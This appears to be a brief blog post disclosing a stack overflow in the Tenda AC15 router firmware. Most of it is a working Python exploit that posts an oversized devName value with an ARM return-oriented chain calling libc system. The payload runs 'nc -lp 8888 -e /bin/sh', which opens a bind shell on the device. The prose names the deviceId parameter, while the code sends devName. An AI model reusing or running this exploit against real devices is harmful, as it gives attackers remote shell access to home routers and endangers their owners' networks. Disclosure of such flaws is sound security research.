Tenda AC15 has buffer overflow

Tenda AC15 V15.03.05.18 has a stack overflow vulnerability in the deviceId parameter of the formSetDeviceName function.

EXP

import requests
from pwn import*

ip = "192.168.107.156"
cgi_name = "SetOnlineDevName"
url = "http://" + ip + "/goform/"+cgi_name
libc = ELF("./lib/libc.so.0")
base = 0xff58c000
pop_r0_pc = 0x0003db80 + base
system = base + libc.sym['system']
stack = 0xfffef0e0
payload = "a"*400 + p32(pop_r0_pc) + p32(stack) + p32(system) + "nc -lp 8888 -e /bin/sh;\x00"

success(hex(system))

data = {"devName":payload, "mac":"00:0c:29:5e:66:11"}
requests.post(url, data=data)

posted @ 2024-09-15 22:55 Amalll 阅读(5) 评论(0) 编辑收藏举报

刷新页面返回顶部

Amalll

Tenda AC15 has buffer overflow

公告